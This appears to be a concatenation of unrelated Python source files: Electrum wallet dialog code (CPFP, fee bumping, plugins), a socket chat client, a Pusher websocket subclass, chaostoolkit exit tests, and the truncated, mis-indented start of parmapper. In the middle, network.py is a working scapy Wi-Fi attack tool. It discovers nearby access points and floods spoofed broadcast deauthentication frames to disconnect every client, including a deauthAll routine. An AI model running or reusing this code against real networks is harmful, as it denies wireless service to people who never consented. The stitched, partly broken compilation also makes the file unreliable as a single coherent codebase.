    state is written, and the window is unregistered from the gui_object last.
    """
    self.wallet.thread.stop()
    if self.network:
        self.network.unregister_callback(self.on_network)
        self.network.unregister_callback(self.on_quotes)
        self.network.unregister_callback(self.on_history)
    self.config.set_key("is_maximized", self.isMaximized())
    # only remember an explicit geometry when not maximized
    if not self.isMaximized():
        g = self.geometry()
        self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
                                              g.width(),g.height()])
    # keep only the last 50 console entries
    self.config.set_key("console-history", self.console.history[-50:],
                        True)
    if self.qr_window:
        self.qr_window.close()
    self.close_wallet()
    # stop receiving timer ticks before the window object goes away
    self.gui_object.timer.timeout.disconnect(self.timer_actions)
    self.gui_object.close_window(self)
def plugins_dialog(self):
    """Show a modal dialog listing all plugins with enable/disable checkboxes.

    Each row holds: the plugin checkbox (col 0), an optional per-plugin
    settings widget (col 1), and a help button (col 2).
    """
    self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
    plugins = self.gui_object.plugins
    vbox = QVBoxLayout(d)
    # plugins
    scroll = QScrollArea()
    scroll.setEnabled(True)
    scroll.setWidgetResizable(True)
    scroll.setMinimumSize(400,250)
    vbox.addWidget(scroll)
    w = QWidget()
    scroll.setWidget(w)
    w.setMinimumHeight(plugins.count() * 35)
    grid = QGridLayout()
    grid.setColumnStretch(0,1)
    w.setLayout(grid)
    # name -> lazily-created settings widget, shared by both closures below
    settings_widgets = {}
    def enable_settings_widget(p, name, i):
        # create the plugin's settings widget on first need, then keep it
        # enabled only while the plugin is loaded and enabled
        widget = settings_widgets.get(name)
        if not widget and p and p.requires_settings():
            widget = settings_widgets[name] = p.settings_widget(d)
            grid.addWidget(widget, i, 1)
        if widget:
            widget.setEnabled(bool(p and p.is_enabled()))
    def do_toggle(cb, name, i):
        # toggle() returns the plugin instance when enabled, None when disabled
        p = plugins.toggle(name)
        cb.setChecked(bool(p))
        enable_settings_widget(p, name, i)
        run_hook('init_qt', self.gui_object)
    for i, descr in enumerate(plugins.descriptions.values()):
        full_name = descr['__name__']
        prefix, _separator, name = full_name.rpartition('.')
        p = plugins.get(name)
        # keystore plugins (hardware wallets) are managed elsewhere
        if descr.get('registers_keystore'):
            continue
        try:
            cb = QCheckBox(descr['fullname'])
            plugin_is_loaded = p is not None
            cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                          or plugin_is_loaded and p.can_user_disable())
            cb.setEnabled(cb_enabled)
            cb.setChecked(plugin_is_loaded and p.is_enabled())
            grid.addWidget(cb, i, 0)
            enable_settings_widget(p, name, i)
            cb.clicked.connect(partial(do_toggle, cb, name, i))
            msg = descr['description']
            if descr.get('requires'):
                msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
            grid.addWidget(HelpButton(msg), i, 2)
        except Exception:
            # a broken plugin must not prevent the dialog from opening
            self.logger.exception(f"cannot display plugin {name}")
    grid.setRowStretch(len(plugins.descriptions.values()), 1)
    vbox.addLayout(Buttons(CloseButton(d)))
    d.exec_()
def cpfp(self, parent_tx, new_tx):
    """Show the Child-Pays-For-Parent dialog and broadcast-prepare the child tx.

    *parent_tx* is the unconfirmed transaction to accelerate; *new_tx* is a
    template child transaction spending one of its outputs back to ourselves.
    On confirmation, replaces new_tx with self.wallet.cpfp(...) and opens the
    transaction window.
    """
    total_size = parent_tx.estimated_size() + new_tx.estimated_size()
    parent_fee = self.wallet.get_tx_fee(parent_tx)
    if parent_fee is None:
        self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
        return
    d = WindowModalDialog(self, _('Child Pays for Parent'))
    vbox = QVBoxLayout(d)
    msg = (
        "A CPFP is a transaction that sends an unconfirmed output back to "
        "yourself, with a high fee. The goal is to have miners confirm "
        "the parent transaction in order to get the fee attached to the "
        "child transaction.")
    vbox.addWidget(WWLabel(_(msg)))
    msg2 = ("The proposed fee is computed using your "
            "fee/kB settings, applied to the total size of both child and "
            "parent transactions. After you broadcast a CPFP transaction, "
            "it is normal to see a new unconfirmed transaction in your history.")
    vbox.addWidget(WWLabel(_(msg2)))
    grid = QGridLayout()
    grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
    grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
    # the child's fee can at most consume the whole output it spends
    max_fee = new_tx.output_value()
    grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
    grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
    output_amount = QLabel('')
    grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
    grid.addWidget(output_amount, 2, 1)
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # FIXME with dyn fees, without estimates, there are all kinds of crashes here
    combined_fee = QLabel('')
    combined_feerate = QLabel('')
    def on_fee_edit(x):
        # NOTE(review): fee_e.get_amount() may return None while the field is
        # empty; the arithmetic below would then raise — confirm BTCAmountEdit
        # behavior during editing.
        out_amt = max_fee - fee_e.get_amount()
        out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
        output_amount.setText(out_amt_str)
        comb_fee = parent_fee + fee_e.get_amount()
        comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
        combined_fee.setText(comb_fee_str)
        comb_feerate = comb_fee / total_size * 1000
        comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
        combined_feerate.setText(comb_feerate_str)
    fee_e.textChanged.connect(on_fee_edit)
    def get_child_fee_from_total_feerate(fee_per_kb):
        # child fee = desired combined fee minus what the parent already pays,
        # clamped to [total_size, max_fee]
        fee = fee_per_kb * total_size / 1000 - parent_fee
        fee = min(max_fee, fee)
        fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
        return fee
    suggested_feerate = self.config.fee_per_kb()
    if suggested_feerate is None:
        self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
        return
    fee = get_child_fee_from_total_feerate(suggested_feerate)
    fee_e.setAmount(fee)
    grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
    grid.addWidget(fee_e, 3, 1)
    def on_rate(dyn, pos, fee_rate):
        fee = get_child_fee_from_total_feerate(fee_rate)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    fee_slider.update()
    grid.addWidget(fee_slider, 4, 1)
    grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
    grid.addWidget(combined_fee, 5, 1)
    grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
    grid.addWidget(combined_feerate, 6, 1)
    vbox.addLayout(grid)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    # NOTE(review): get_amount() may be None here too; 'fee > max_fee' would
    # then raise TypeError — confirm the dialog cannot be accepted while empty.
    fee = fee_e.get_amount()
    if fee > max_fee:
        self.show_error(_('Max fee exceeded'))
        return
    new_tx = self.wallet.cpfp(parent_tx, fee)
    new_tx.set_rbf(True)
    self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
    """Show the RBF fee-bump dialog for *tx* and open the replacement tx.

    Lets the user pick a new (higher) fee, optionally marking the replacement
    as final; builds the replacement via wallet.bump_fee and shows it.
    """
    fee = self.wallet.get_tx_fee(tx)
    if fee is None:
        self.show_error(_("Can't bump fee: unknown fee for original transaction."))
        return
    tx_label = self.wallet.get_label(tx.txid())
    tx_size = tx.estimated_size()
    d = WindowModalDialog(self, _('Bump Fee'))
    vbox = QVBoxLayout(d)
    vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
    vbox.addWidget(QLabel(_('Current fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
    # fix: translate 'New fee' alone so it shares the translation key used by
    # the other labels ('Current fee' + ':'), instead of _('New fee' + ':')
    vbox.addWidget(QLabel(_('New fee') + ':'))
    fee_e = BTCAmountEdit(self.get_decimal_point)
    # suggest 1.5x the current fee; keep it an integer number of satoshis
    fee_e.setAmount(int(fee * 1.5))
    vbox.addWidget(fee_e)
    def on_rate(dyn, pos, fee_rate):
        fee = int(fee_rate * tx_size / 1000)
        fee_e.setAmount(fee)
    fee_slider = FeeSlider(self, self.config, on_rate)
    vbox.addWidget(fee_slider)
    cb = QCheckBox(_('Final'))
    vbox.addWidget(cb)
    vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
    if not d.exec_():
        return
    is_final = cb.isChecked()
    new_fee = fee_e.get_amount()
    # fix: get_amount() returns None for an empty/invalid field; the old code
    # then raised TypeError on 'new_fee - fee'
    if new_fee is None:
        self.show_error(_('Invalid fee'))
        return
    delta = new_fee - fee
    if delta < 0:
        self.show_error("fee too low")
        return
    try:
        new_tx = self.wallet.bump_fee(tx, delta)
    except CannotBumpFee as e:
        self.show_error(str(e))
        return
    if is_final:
        new_tx.set_rbf(False)
    self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
    """Add an offline transaction to the wallet history.

    Returns True when the transaction was stored (and the user was told it
    still needs broadcasting), False when it conflicted or was rejected.
    """
    win = self.top_level_window()
    try:
        added = self.wallet.add_transaction(tx.txid(), tx)
    except AddTransactionException as e:
        win.show_error(e)
        return False
    if not added:
        win.show_error(_("Transaction could not be saved.") + "\n" +
                       _("It conflicts with current history."))
        return False
    self.wallet.storage.write()
    # need to update at least: history_list, utxo_list, address_list
    self.need_update.set()
    msg = (_("Transaction added to wallet history.") + '\n\n' +
           _("Note: this is an offline transaction, if you want the network "
             "to see it, you need to broadcast it."))
    win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
    return True
|
network.py | from operator import ne
import sys, os, signal,json
from multiprocessing import Process
from itsdangerous import exc
from scapy.layers.dot11 import Dot11, Dot11Beacon, Dot11ProbeResp,Dot11Elt, RadioTap, sendp, Dot11Deauth
from scapy.all import *
def channel_hopper(interface="wlan0mon", dwell=1, hops=None):
    """Repeatedly tune *interface* to a random 2.4 GHz channel (1-13).

    Generalized from the previous hard-coded "wlan0mon"/1-second version,
    keeping the no-argument behavior identical.

    :param interface: monitor-mode interface to retune via ``iw``
    :param dwell: seconds to stay on each channel
    :param hops: stop after this many channel switches; None = run until
                 KeyboardInterrupt (original behavior)
    """
    # explicit imports: the module previously relied on scapy's star import
    # to provide random/time, which is fragile across scapy versions
    import os
    import random
    import time
    done = 0
    while hops is None or done < hops:
        try:
            channel = random.randrange(1, 14)  # channels 1..13
            exe = "iw dev %s set channel %d" % (interface, channel)
            os.system(exe)
            print(exe)
            time.sleep(dwell)
            done += 1
        except KeyboardInterrupt:
            break
class Ap:
    """Record of a discovered 802.11 access point."""

    def __init__(self, ssid, bssid, channel, enc):
        self.ssid = ssid        # network name (from the beacon's SSID element)
        self.bssid = bssid      # AP MAC address
        self.channel = channel  # channel, stored as a string
        self.enc = enc          # 'Y' if the capability field advertised privacy, else 'N'

    def getApInfo(self):
        """Return the AP identity as a dict (the encryption flag is not included)."""
        return {
            "ssid": self.ssid,
            "bssid": self.bssid,
            "channel": self.channel,
        }
class Network:
    """Discover nearby 802.11 access points and run deauthentication attacks
    through a monitor-mode interface, using scapy.
    """

    def __init__(self, interface):
        self.interface = interface    # monitor-mode interface, e.g. "wlan0mon"
        self.aps = {}                 # bssid (str) -> Ap record
        self.target = ""              # bssid currently measured by getRssi()
        self.rssList = []             # RSSI samples for the current target
        self.attackAP = []            # attack list shared with other threads
        self.processList = []         # channel-hopper Process objects

    def updateApList(self):
        """Sniff beacons/probe responses for 10 s while hopping channels."""
        self.hopStart()
        sniff(iface=self.interface, prn=self.sniffAP, timeout=10)
        self.hopStop()

    def getApList(self):
        """Return [{'ssid', 'bssid', 'channel'}, ...] for every AP seen so far."""
        return [ap.getApInfo() for ap in self.aps.values()]

    def getPowerData(self, adr, channel):
        """Average RSSI over 50 sniffed frames from BSSID *adr* on *channel*.

        Returns -100 when no matching frame was heard.
        """
        print(adr, channel)
        self.target = adr
        self.rssList = []
        self.setChannel(channel)
        sniff(iface=self.interface, prn=self.getRssi, count=50)
        if not self.rssList:
            return -100
        return sum(self.rssList) / len(self.rssList)

    def getRssi(self, pkt):
        """sniff() callback: record the RSSI of beacons from self.target."""
        if pkt.haslayer(Dot11):
            # type 0 / subtype 8 == management / beacon frame
            if pkt.type == 0 and pkt.subtype == 8:
                if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
                    if pkt.addr3 == self.target:
                        try:
                            # RSSI read from the undecoded RadioTap tail;
                            # NOTE(review): the -4:-3 offset is driver-dependent
                            # — confirm for the adapter in use.
                            extra = pkt.notdecoded
                            rssi = -(256 - ord(extra[-4:-3]))
                        except Exception:
                            rssi = -100
                        print(rssi)
                        self.rssList.append(rssi)

    def setChannel(self, channel):
        """Tune the interface to *channel* via the `iw` command."""
        exe = "iw dev %s set channel %d" % (self.interface, channel)
        os.system(exe)

    def hopStop(self):
        """Terminate and reap every running channel-hopper process."""
        for pro in self.processList:
            pro.terminate()
            pro.join()
        self.processList.clear()

    def hopStart(self):
        """Spawn a channel-hopper process and remember it for hopStop()."""
        tmpProcess = Process(target=channel_hopper)
        tmpProcess.start()
        self.processList.append(tmpProcess)

    def sniffAP(self, pkt):
        """sniff() callback: register every not-yet-seen AP that advertises itself."""
        if ((pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)) and not pkt[Dot11].addr3 in self.aps.keys()):
            ssid = pkt[Dot11Elt].info
            bssid = pkt[Dot11].addr3
            # 3rd information element is the DS Parameter Set (1-byte channel)
            channel = int(ord(pkt[Dot11Elt:3].info))
            capability = pkt.sprintf("{Dot11Beacon:%Dot11Beacon.cap%}{Dot11ProbeResp:%Dot11ProbeResp.cap%}")
            # Check for encrypted networks
            if re.search("privacy", capability): enc = 'Y'
            else: enc = 'N'
            # Save discovered AP
            self.aps[pkt[Dot11].addr3] = Ap(str(ssid), str(bssid), str(channel), enc)
            # Display discovered AP
            print("%02d %s %s %s" % (int(channel), enc, bssid, ssid))

    def deAuth(self, apAdr, channel):
        """Broadcast 50 deauth frames spoofed as coming from AP *apAdr*."""
        self.setChannel(channel)
        ap = apAdr
        client = "FF:FF:FF:FF:FF:FF"  # broadcast: disconnect every client
        pkt = RadioTap() / Dot11(addr1=client, addr2=ap, addr3=ap) / Dot11Deauth()
        sendp(pkt, iface=self.interface, inter=0.100, loop=1, count=50)

    def autoDeAuth(self):
        """Broadcast deauth frames for every known AP.

        BUG FIX: self.aps maps bssid -> Ap, so iterating the dict yields
        bssid *strings*; the old code accessed i.bssid, which always raised
        AttributeError that the bare except swallowed — no packet was ever
        sent.
        """
        time.sleep(1)
        print(self.attackAP)
        print("thread:", id(self.attackAP))
        for bssid in self.aps:
            try:
                pkt = RadioTap() / Dot11(addr1="FF:FF:FF:FF:FF:FF", addr2=bssid, addr3=bssid) / Dot11Deauth()
                print(bssid, "Send Deauth Packet")
                sendp(pkt, iface=self.interface, inter=0.1, loop=1, count=30)
            except Exception:
                # keep attacking the remaining APs even if one send fails
                continue

    def deauthAll(self):
        """Deauth every discovered AP, tuning to each AP's channel first."""
        aplist = self.getApList()
        for ap in aplist:
            print("Now Attack:", ap['ssid'], ap['bssid'])
            self.setChannel(int(ap['channel']))
            pkt = RadioTap() / Dot11(addr1="FF:FF:FF:FF:FF:FF", addr2=ap['bssid'], addr3=ap['bssid']) / Dot11Deauth()
            sendp(pkt, iface=self.interface, inter=0.1, loop=1, count=30)
if __name__ == "__main__":
    # Manual smoke test: exercise the channel hopper on a monitor-mode
    # interface, then stop/restart it.  The commented lines below are
    # alternate entry points kept as usage examples.
    # Start the channel hopper
    network = Network("wlan0mon")
    #print("set channel")
    network.hopStart()
    time.sleep(4)
    network.hopStop()
    network.hopStart()
    #print("dar", network.getPowerData("fc:7f:f1:b0:55:80", 6))
    # network.getPowerData("fc:7f:f1:ae:80:e0", 11)
    #network.deAuth("FF:FF:FF:FF:FF:FF", "90:9f:33:1b:13:aa", 1)
    #network.deAuth("FF:FF:FF:FF:FF:FF", "FF:FF:FF:FF:FF:FF", 1)
    #network.deAuth("08:AE:D6:01:98:5F", "90:9f:33:1b:13:aa", 1)
    #network.updateApList(p)
    #print(network.getApList())
    #p2 = Process(target=network.getPowerData)
    #p2.start()
    # Start the sniffer
#sniff(iface=network.interface, prn=network.sniffAP) |
client.py | import socket
import argparse
import threading
# Chat client: connects to a server at a user-supplied ip and port.
# Default port to connect to; may be overridden with the -p option below.
port = 4000
def handle_receive(client_socket, user):
    """Receive chat lines from the server and print every message not sent
    by *user* (the server includes the sender's name in the payload).

    Fixes:
    - the parameter was misspelled 'lient_socket', so the body silently used
      the module-global socket instead of the one passed in
    - recv() returning b'' (peer closed the connection) used to busy-loop
      printing empty lines forever; now it ends the thread
    """
    while True:
        try:
            data = client_socket.recv(1024)
        except OSError:
            print("연결 끊김")  # user-facing "connection lost" message, kept as-is
            break
        if not data:
            # orderly shutdown by the server
            break
        text = data.decode('utf-8')
        # skip the echo of our own messages
        if user not in text:
            print(text)
def handle_send(client_socket):
    """Read lines from stdin and forward each to the server.

    The quit command "/종료" is sent to the server first, then the loop ends
    and the socket is closed.
    """
    while True:
        message = input()
        client_socket.send(message.encode('utf-8'))
        if message == "/종료":
            break
    client_socket.close()
if __name__ == '__main__':
    # argparse reference: https://docs.python.org/ko/3/library/argparse.html
    # description - text displayed before the argument help (default: none)
    # help - a short description of what the argument does
    # nargs - number of command-line args consumed; '+' gathers all of them
    #         into a list and warns when none are given
    # required - whether the option may be omitted (optional arguments only)
    parser = argparse.ArgumentParser(description="\nJoo's client\n-p port\n-i host\n-s string")
    parser.add_argument('-p', help="port")
    parser.add_argument('-i', help="host", required=True)
    parser.add_argument('-u', help="user", required=True)
    args = parser.parse_args()
    host = args.i
    user = str(args.u)
    try:
        port = int(args.p)
    except:  # -p omitted or not numeric: keep the module default (4000)
        pass
    # Create an IPv4, TCP socket object
    client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Connect to the server at the given host and port
    client_socket.connect((host, port))
    # First message identifies this user to the server
    client_socket.send(user.encode('utf-8'))
    # One daemon thread receives, another sends; exit when both finish
    receive_thread = threading.Thread(target=handle_receive, args=(client_socket, user))
    receive_thread.daemon = True
    receive_thread.start()
    send_thread = threading.Thread(target=handle_send, args=(client_socket,))
    send_thread.daemon = True
    send_thread.start()
    send_thread.join()
    receive_thread.join()
|
websocket_override.py |
import time
import six
import json
import threading
from websocket._abnf import ABNF
from websocket._core import WebSocket, getdefaulttimeout
from websocket._exceptions import *
import websocket._logging
class PusherWebsocket(websocket.WebSocket):
    """WebSocket whose ping() sends a Pusher application-level ping event
    instead of a raw WebSocket PING frame."""

    def ping(self, payload=""):
        # *payload* is accepted for interface compatibility but ignored:
        # Pusher expects its own JSON ping message.
        self.send(json.dumps({'event': "pusher:ping", 'data': '{}'}))
class PusherWebsocketApp(websocket.WebSocketApp):
    """WebSocketApp that understands Pusher's application-level ping/pong.

    Pings go out as Pusher JSON events (see PusherWebsocket.ping) and a TEXT
    frame '{"event":"pusher:pong","data":"{}"}' is treated like a protocol
    PONG for the ping/pong timeout bookkeeping.
    """

    def run_forever(self, sockopt=None, sslopt=None,
                    ping_interval=0, ping_timeout=None,
                    http_proxy_host=None, http_proxy_port=None,
                    http_no_proxy=None, http_proxy_auth=None,
                    skip_utf8_validation=False,
                    host=None, origin=None, dispatcher=None):
        """Connect and dispatch events until the socket closes or errors.

        Mirrors websocket.WebSocketApp.run_forever but builds a
        PusherWebsocket and recognizes Pusher pong text frames.
        """
        if not ping_timeout or ping_timeout <= 0:
            ping_timeout = None
        if ping_timeout and ping_interval and ping_interval <= ping_timeout:
            raise WebSocketException("Ensure ping_interval > ping_timeout")
        if sockopt is None:
            sockopt = []
        if sslopt is None:
            sslopt = {}
        if self.sock:
            raise WebSocketException("socket is already opened")
        thread = None
        close_frame = None
        self.keep_running = True
        self.last_ping_tm = 0
        self.last_pong_tm = 0

        def teardown():
            # fix: Thread.isAlive()/setDaemon() were removed in Python 3.9;
            # use is_alive() / the daemon attribute instead
            if thread and thread.is_alive():
                event.set()
                thread.join()
            self.keep_running = False
            self.sock.close()
            close_args = self._get_close_args(
                close_frame.data if close_frame else None)
            self._callback(self.on_close, *close_args)
            self.sock = None

        try:
            self.sock = PusherWebsocket(
                self.get_mask_key, sockopt=sockopt, sslopt=sslopt,
                fire_cont_frame=self.on_cont_message and True or False,
                skip_utf8_validation=skip_utf8_validation)
            self.sock.settimeout(getdefaulttimeout())
            self.sock.connect(
                self.url, header=self.header, cookie=self.cookie,
                http_proxy_host=http_proxy_host,
                http_proxy_port=http_proxy_port, http_no_proxy=http_no_proxy,
                http_proxy_auth=http_proxy_auth, subprotocols=self.subprotocols,
                host=host, origin=origin)
            if not dispatcher:
                dispatcher = self.create_dispatcher(ping_timeout)
            self._callback(self.on_open)
            if ping_interval:
                event = threading.Event()
                thread = threading.Thread(
                    target=self._send_ping, args=(ping_interval, event))
                thread.daemon = True
                thread.start()

            def read():
                # BUG FIX: close_frame must be declared nonlocal; without it
                # the assignment below created a read()-local variable, so
                # teardown() always saw None and on_close never received the
                # server's close status/reason.
                nonlocal close_frame
                if not self.keep_running:
                    return teardown()
                op_code, frame = self.sock.recv_data_frame(True)
                if op_code == ABNF.OPCODE_CLOSE:
                    close_frame = frame
                    return teardown()
                elif op_code == ABNF.OPCODE_PING:
                    self._callback(self.on_ping, frame.data)
                elif op_code == ABNF.OPCODE_PONG or frame.data.decode("utf-8") == '{"event":"pusher:pong","data":"{}"}':
                    # Pusher pongs arrive as TEXT frames, not PONG opcodes
                    self.last_pong_tm = time.time()
                    self._callback(self.on_pong, frame.data)
                elif op_code == ABNF.OPCODE_CONT and self.on_cont_message:
                    self._callback(self.on_data, frame.data,
                                   frame.opcode, frame.fin)
                    self._callback(self.on_cont_message,
                                   frame.data, frame.fin)
                else:
                    data = frame.data
                    if six.PY3 and op_code == ABNF.OPCODE_TEXT:
                        data = data.decode("utf-8")
                    self._callback(self.on_data, data, frame.opcode, True)
                    self._callback(self.on_message, data)
                return True

            def check():
                # fail when a ping went unanswered for longer than ping_timeout
                if ping_timeout and self.last_ping_tm \
                        and time.time() - self.last_ping_tm > ping_timeout \
                        and self.last_ping_tm - self.last_pong_tm > ping_timeout:
                    raise WebSocketTimeoutException("ping/pong timed out")
                return True

            dispatcher.read(self.sock.sock, read, check)
        except (Exception, KeyboardInterrupt, SystemExit) as e:
            self._callback(self.on_error, e)
            if isinstance(e, SystemExit):
                # propagate SystemExit further
                raise
            teardown()
|
test_exit.py | import os
import threading
import time
from copy import deepcopy
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
import pytest
from fixtures import experiments
from chaoslib.exit import exit_gracefully, exit_ungracefully
from chaoslib.run import Runner
from chaoslib.types import Strategy
pytestmark = pytest.mark.skipif(os.getenv("CI") is not None, reason="Skip CI")
def run_http_server_in_background(port=8700):
    """Serve exactly one (deliberately slow) HTTP request, then return.

    Used as a thread target by the tests in this module: the experiment
    fixtures issue an HTTP call against this server while a graceful or
    ungraceful exit is triggered mid-call.

    :param port: TCP port to bind on all interfaces. Defaults to 8700,
        the port the experiment fixtures point at.
    """

    def slow_app(environ, start_response):
        # Sleep long enough that exit_gracefully()/exit_ungracefully()
        # fires while the HTTP call is still in flight.
        time.sleep(5)
        status = "200 OK"
        headers = [("Content-type", "text/plain; charset=utf-8")]
        start_response(status, headers)
        return [b"Hello World"]

    def make_server(host, port, app):
        server = WSGIServer((host, port), WSGIRequestHandler)
        server.set_app(app)
        return server

    httpd = make_server("", port, slow_app)
    try:
        httpd.handle_request()
    finally:
        # Fix: release the listening socket so back-to-back tests can
        # rebind the same port without hitting EADDRINUSE.
        httpd.server_close()
def test_play_rollbacks_on_graceful_exit_with_http_action():
    """Rollbacks (strategy 'always') must run when the run is interrupted
    gracefully in the middle of a long HTTP action."""
    http_thread = threading.Thread(target=run_http_server_in_background)
    http_thread.start()
    experiment = deepcopy(experiments.ExperimentGracefulExitLongHTTPCall)
    settings = {"runtime": {"rollbacks": {"strategy": "always"}}}
    with Runner(Strategy.DEFAULT) as runner:
        journal = runner.run(experiment, settings=settings)
        assert journal["status"] == "interrupted"
        assert len(journal["rollbacks"]) == 1
    http_thread.join()
def test_do_not_play_rollbacks_on_graceful_exit_with_http_action():
    """An ungraceful exit during a long HTTP action must leave the
    rollbacks unplayed, even with the 'always' strategy."""
    http_thread = threading.Thread(target=run_http_server_in_background)
    http_thread.start()
    experiment = deepcopy(experiments.ExperimentUngracefulExitLongHTTPCall)
    settings = {"runtime": {"rollbacks": {"strategy": "always"}}}
    with Runner(Strategy.DEFAULT) as runner:
        journal = runner.run(experiment, settings=settings)
        assert journal["status"] == "interrupted"
        assert len(journal["rollbacks"]) == 0
    http_thread.join()
def test_play_rollbacks_on_graceful_exit_with_process_action():
    """A graceful exit during a long process action still plays rollbacks
    when the strategy is 'always'."""
    experiment = deepcopy(experiments.ExperimentGracefulExitLongProcessCall)
    settings = {"runtime": {"rollbacks": {"strategy": "always"}}}
    with Runner(Strategy.DEFAULT) as runner:
        journal = runner.run(experiment, settings=settings)
        assert journal["status"] == "interrupted"
        assert len(journal["rollbacks"]) == 1
def test_do_not_play_rollbacks_on_graceful_exit_with_process_action():
    """An ungraceful exit during a long process action must skip the
    rollbacks, even with the 'always' strategy."""
    experiment = deepcopy(experiments.ExperimentUngracefulExitLongProcessCall)
    settings = {"runtime": {"rollbacks": {"strategy": "always"}}}
    with Runner(Strategy.DEFAULT) as runner:
        journal = runner.run(experiment, settings=settings)
        assert journal["status"] == "interrupted"
        assert len(journal["rollbacks"]) == 0
def test_play_rollbacks_on_graceful_exit_with_python_action():
    """A graceful exit during a long Python action still plays rollbacks
    when the strategy is 'always'."""
    experiment = deepcopy(experiments.ExperimentGracefulExitLongPythonCall)
    settings = {"runtime": {"rollbacks": {"strategy": "always"}}}
    with Runner(Strategy.DEFAULT) as runner:
        journal = runner.run(experiment, settings=settings)
        assert journal["status"] == "interrupted"
        assert len(journal["rollbacks"]) == 1
def test_do_not_play_rollbacks_on_graceful_exit_with_python_action():
    # NOTE(review): despite the "_python_action" name, this test reuses the
    # *HTTP* experiment and HTTP server, making it an exact duplicate of
    # test_do_not_play_rollbacks_on_graceful_exit_with_http_action above.
    # This looks like a copy/paste leftover -- confirm whether it should use
    # an "UngracefulExitLongPythonCall"-style fixture instead.
    server = threading.Thread(target=run_http_server_in_background)
    server.start()
    x = deepcopy(experiments.ExperimentUngracefulExitLongHTTPCall)
    with Runner(Strategy.DEFAULT) as runner:
        journal = runner.run(
            x, settings={"runtime": {"rollbacks": {"strategy": "always"}}}
        )
        assert journal["status"] == "interrupted"
        assert len(journal["rollbacks"]) == 0
    server.join()
def test_wait_for_background_activity_on_graceful_exit():
    """A graceful exit lets the in-flight HTTP activity finish, so the
    recorded duration reflects the activity's own timeout window."""
    http_thread = threading.Thread(target=run_http_server_in_background)
    http_thread.start()
    experiment = deepcopy(experiments.ExperimentGracefulExitLongHTTPCall)
    with Runner(Strategy.DEFAULT) as runner:
        journal = runner.run(experiment)
        assert journal["status"] == "interrupted"
        duration = journal["run"][0]["duration"]
        assert 3.0 < duration < 3.2
    http_thread.join()
def test_do_not_wait_for_background_activity_on_ungraceful_exit():
    """An ungraceful exit interrupts a running background activity and
    records it as failed with an ExperimentExitedException."""

    def trigger_ungraceful_exit():
        time.sleep(1.5)
        exit_ungracefully()

    trigger = threading.Thread(target=trigger_ungraceful_exit)
    experiment = deepcopy(experiments.SimpleExperimentWithBackgroundActivity)
    with Runner(Strategy.DEFAULT) as runner:
        trigger.start()
        journal = runner.run(experiment)
        assert journal["status"] == "interrupted"
        assert journal["run"][0]["status"] == "failed"
        assert "ExperimentExitedException" in journal["run"][0]["exception"][-1]
def test_wait_for_background_activity_to_finish_on_graceful_exit():
    """A graceful exit lets an already-running background activity run to
    completion, so it is recorded as succeeded."""

    def trigger_graceful_exit():
        time.sleep(1.5)
        exit_gracefully()

    trigger = threading.Thread(target=trigger_graceful_exit)
    experiment = deepcopy(experiments.SimpleExperimentWithBackgroundActivity)
    with Runner(Strategy.DEFAULT) as runner:
        trigger.start()
        journal = runner.run(experiment)
        assert journal["status"] == "interrupted"
        assert journal["run"][0]["status"] == "succeeded"
|
parmapper.py | # -*- coding: utf-8 -*-
"""
parmap (or parmapper): Tool for easy parallel function mapping
without requiring a pickleable function (e.g. lambdas).
This script is from Jwink3101, https://github.com/Jwink3101/parmapper
"""
from __future__ import print_function, unicode_literals, division
__version__ = '20210422.0'
import multiprocessing as mp
import multiprocessing.dummy as mpd
from threading import Thread
import threading
import sys,os
from collections import defaultdict
import warnings
import math
try:
from queue import Queue
except ImportError:
from Queue import Queue
try:
import tqdm
except ImportError:
tqdm = None
from functools import partial
if sys.version_info[0] > 2:
unicode = str
xrange = range
imap = map
else:
from itertools import imap
CPU_COUNT = mp.cpu_count()
class _Exception(object):
"""Storage of an exception (and easy detection)"""
def __init__(self,E,infun=True):
self.E = E
self.infun = infun
def parmap(fun,seq,
           N=None,Nt=1,
           chunksize=1,
           ordered=True,
           daemon=True,
           progress=False,
           args=(),kwargs=None,
           star=False,kwstar=False,
           exception=None):
    """
    parmap -- Simple parallel mapper that can split amongst processes (N)
    and threads (Nt) (within the processes).

    Does *NOT* require functions to be pickleable (unlike
    vanilla multiprocess.Pool.map)

    Inputs:
    -------
    fun
        Single input function. Use lambdas or functools.partial
        to enable/expand multi-input. See example

    seq
        Sequence of inputs to map in parallel

    Options:
    --------
    N [None] (integer or None)
        Number of processes to use. If `None`, will use the CPU_COUNT

    Nt [1] (integer)
        Number of threads to use. See notes below on multi-threaded vs
        multi-processes.

    chunksize [1] (int)
